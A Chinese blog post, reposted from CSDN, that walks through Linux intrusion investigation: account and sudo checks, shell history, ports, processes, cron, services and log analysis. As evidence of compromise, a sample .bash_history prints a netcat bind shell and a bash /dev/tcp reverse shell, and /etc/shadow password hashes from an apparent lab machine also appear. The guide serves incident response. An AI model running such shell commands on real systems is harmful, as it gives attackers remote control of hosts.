应急响应基础(二)——Linux入侵排查
文章来源:橘子女侠
版权声明:本文为CSDN博主「橘子女侠」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。https://blog.csdn.net/qq_38684504/java/article/details/97765418
Linux入侵排查思路
(1)账号安全
1、用户信息文件:/etc/passwd
root:x:0:0:root:/root:/bin/bash
用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后shell
注意:无密码只允许本机登陆,远程不允许登陆
2、影子文件:/etc/shadow
root:$6$dIEKcGV4PJpr6kGu$jSpNY9SGXkkE3XakM4neFh24UT6G3mB0OCWV3ciTgmtntVEKFZ3Zc5BU69cLXqSBllz/JxA2YRC77xCG9A5YP/:17966:0:99999:7:::
用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留
3、who:查看当前登录用户(tty本地登录,pts远程登录)
w:查看系统信息,某一时刻用户的行为;
uptime:查看登录多久,多少用户,负载;
[root@redhat 桌面]# who
root tty1 2019-04-15 01:38 (:0)
root pts/0 2019-05-20 13:05 (:0.0)
root pts/3 2019-05-20 14:16 (:0.0)
root pts/10 2019-07-30 14:18 (:0.0)
[root@redhat 桌面]# w
14:22:54 up 6:43, 4 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 :0 15Apr19 106days 1:06 1:06 /usr/bin/Xorg :
root pts/0 :0.0 20May19 71days 0.14s 0.08s bash
root pts/3 :0.0 20May19 71days 0.39s 0.39s /bin/bash
root pts/10 :0.0 14:18 0.00s 0.42s 0.20s w
[root@redhat 桌面]# uptime
14:22:59 up 6:43, 4 users, load average: 0.00, 0.01, 0.00
4、入侵排查
1、查询特权用户特权用户(uid 为0)
[root@redhat 桌面]# awk -F: '$3==0{print $1}' /etc/passwd
root
yaoyao
2、查询可以远程登录的帐号信息
[root@redhat 桌面]# awk '/\$1|\$6/{print $1}' /etc/shadow
root:$6$dIEKcGV4PJpr6kGu$jSpNY9SGXkkE3XakM4neFh24UT6G3mB0OCWV3ciTgmtntVEKFZ3Zc5BU69cLXqSBllz/JxA2YRC77xCG9A5YP/:17966:0:99999:7:::
yaoyao2:$6$EUXxnIJY$28gZzQb8LU2FXHAy26qiJsIItl0N3Vuh0smJiGvBB8fDcWj2sAYugGNpvHziwfqXIo8UojVhr4SPEKD7ZWO.s0:17973:0:99999:7:::
tangyan:$6$e.JWZKLS$v8uDzLjYgET0cF8Y2zfdcz6f85k1aP8NY0sYPoYDRx5gaxJ1ELQGjeXKFmgIF9nK9ovRJHi/rSqUnplubMKFp/:17986:0:99999:7:::
xiaoqi:$6$f8XiLhMA$4dTZ4vGJjwKK.Zxc/UI2Ch3UnWB0Y9zdYpN2ZUtbtMdFkRVivoBm09KMX9XMHGqV7v/G39cvRddu0Fuqf3hZf1:17986:0:99999:7:::
3、除root帐号外,其他帐号是否存在sudo权限。如非管理需要,普通帐号应删除sudo权限
[root@redhat 桌面]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
tom ALL=(ALL) NOPASSWD:ALL
4、禁用或删除多余及可疑的帐号
usermod -L user 禁用帐号,帐号无法登录,/etc/shadow第二栏为!开头
userdel user 删除user用户
userdel -r user 将删除user用户,并且将/home目录下的user目录一并删除
(2)历史命令
1、通过.bash_history查看帐号执行过的系统命令;
[root@redhat ~]# more .bash_history
sh neicun.sh
sh get-mac.sh
sh act-ip.sh
vim #!/bin/bash
vim getarp.sh
arping -c 2 -w 1 192.168.37.2
arping -c 2 -w 1 192.168.37.2 -I eth1
ifconfig
2、root的历史命令:history
[root@redhat ~]# history
......
529 awk -F: '$3==0{print $1}' /etc/passwd
530 awk '/\$1|\$6/{print $1}' /etc/shadow
531 more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
532 ls
533 cd /root
534 ls
535 ls -la
536 vim .bash_history
537 more .bash_history
538 history
3、打开/home各帐号目录下的.bash_history,查看普通帐号的历史命令;
[root@redhat ~]# more /home/tom/.bash_history
who am i
whoami
bin/dash
/bin/dash
exit
whoami
pwd
whoami
nc -nvlp 8080 -t -e /bin/bash
bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
4、历史操作命令的清除:history -c
但此命令并不会清除保存在文件中的记录,因此需要手动删除.bash_profile文件中的记录。
5、入侵排查
进入用户目录下:cat .bash_history >> history.txt
(3)检查异常端口
1、使用netstat 网络连接命令,分析可疑端口、IP、PID
[root@redhat ~]# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1971/rpcbind
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 2236/sshd
2、查看PID对应进程文件路径
[root@redhat ~]# ls -l /proc/2236/exe
lrwxrwxrwx. 1 root root 0 7月 30 14:50 /proc/2236/exe -> /usr/sbin/sshd
(4)检查异常进程
使用ps命令,分析进程
[root@redhat ~]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 19360 1280 ? Ss 07:39 0:05 /sbin/init
root 2 0.0 0.0 0 0 ? S 07:39 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 07:39 0:00 [migration/0]
(5)检查开机启动项
查看系统启动项也是一个有效发现黑客攻击的方法,查看的方法也很简单,就是查看几个系统文件就行了,一般来说我们只需要查看下述的这几个文件就行
系统启动项:
more /etc/rc.local
ls -l /etc/rc.d/rc[0~6].d
ls -l /etc/rc.d/rc3.d/
more /etc/ld.so.preload linux动态链接库,linux正常程序运行过程中,动态链接器会读取LD_PRELOAD环境变量的值和默认配置文件/etc/ld.so.preload的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库。
(6) 检查定时任务
1、利用crontab创建计划任务
基本命令:
crontab -l :列出某个用户cron服务的详细内容
crontab -r :删除每个用户cront任务(谨慎:删除所有的计划任务)
crontab -e :使用编辑器编辑当前的crontab文件
ls -al /var/spool/cron/ :查看计划任务文件
more /etc/crontab :查看计划任务
如:*/1 * * * * echo "hello world" >> /tmp/test.txt 每分钟写入文件
2、入侵排查
重点关注以下目录中是否存在恶意脚本
/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab
/var/spool/anacron/*
#小技巧
可以使用 more /etc/cron.daily/* 查看目录下的所有文件
root@root:/etc/cron.daily# more /etc/cron.daily/*
::::::::::::::
/etc/cron.daily/0anacron
::::::::::::::
#!/bin/sh
#
# anacron's cron script
#
# This script updates anacron time stamps. It is called through run-parts
# either by anacron itself or by cron.
#
# The script is called "0anacron" to assure that it will be executed
# _before_ all other scripts.
test -x /usr/sbin/anacron || exit 0
anacron -u cron.daily
(7) 检查服务
服务自启动
第一种修改方法:
chkconfig [--level 运行级别] [独立服务名] [on|off]
chkconfig –level 2345 httpd on 开启自启动
chkconfig httpd on (默认level是2345)
第二种修改方法:
修改/etc/re.d/rc.local 文件
加入 /etc/init.d/httpd start
第三种修改方法:
使用ntsysv命令管理自启动,可以管理独立服务和xinetd服务。
入侵排查
1、查询已安装的服务:
RPM包安装的服务
chkconfig --list 查看服务自启动状态,可以看到所有的RPM包安装的服务
ps aux | grep crond 查看当前服务
系统在3与5级别下的启动项
中文环境
chkconfig --list | grep "3:启用\|5:启用"
英文环境
chkconfig --list | grep "3:on\|5:on"
源码包安装的服务
查看服务安装位置 ,一般是在/user/local/
service httpd start
搜索/etc/rc.d/init.d/ 查看是否存在
(8) 检查异常文件
1、查看敏感目录,如/tmp目录下的文件,同时注意隐藏文件夹,以“..”为名的文件夹具有隐藏属性
2、得到发现WEBSHELL、远控木马的创建时间,如何找出同一时间范围内创建的文件?
可以使用find命令来查找,如 find /opt -iname "*" -atime 1 -type f 找出 /opt 下一天前访问过的文件
3、针对可疑文件可以使用stat进行创建修改时间。
(9) 检查系统日志
日志默认存放位置:/var/log/
查看日志配置情况:more /etc/rsyslog.conf
日志文件 说明
/var/log/cron 记录了系统定时任务相关的日志
/var/log/cups 记录打印信息的日志
/var/log/dmesg 记录了系统在开机时内核自检的信息,也可以使用dmesg命令直接查看内核自检信息
/var/log/mailog 记录邮件信息
/var/log/message 记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件
/var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,这个文件是二进制文件,不能直接vi,而要使用lastlog命令查看
/var/log/wtmp 永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件,不能直接vi,而需要使用last命令来查看
/var/log/utmp 记录当前已经登录的用户信息,这个文件会随着用户的登录和注销不断变化,只记录当前登录用户的信息。同样这个文件不能直接vi,而要使用w,who,users等命令来查询
/var/log/secure 记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中
日志分析技巧:
1、定位有多少IP在爆破主机的root帐号:
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
定位有哪些IP在爆破:
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c
爆破用户名字典是什么?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
2、登录成功的IP有哪些:
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
3、增加一个用户kali日志:
Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali
, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
#grep "useradd" /var/log/secure
4、删除用户kali日志:
Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed group 'kali' owned by 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'kali' owned by 'kali'
# grep "userdel" /var/log/secure
5、su切换用户:
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)
sudo授权执行:
sudo -l
Jul 10 00:43:09 localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now
原文参考链接:
https://blog.csdn.net/qq_23936389/article/details/83511323
往期精选
*Kali linux渗透测试系列—16、Kali linux信息收集之SNMP信息枚举
*Kali linux渗透测试系列—15、Kali linux信息收集之SMB信息枚举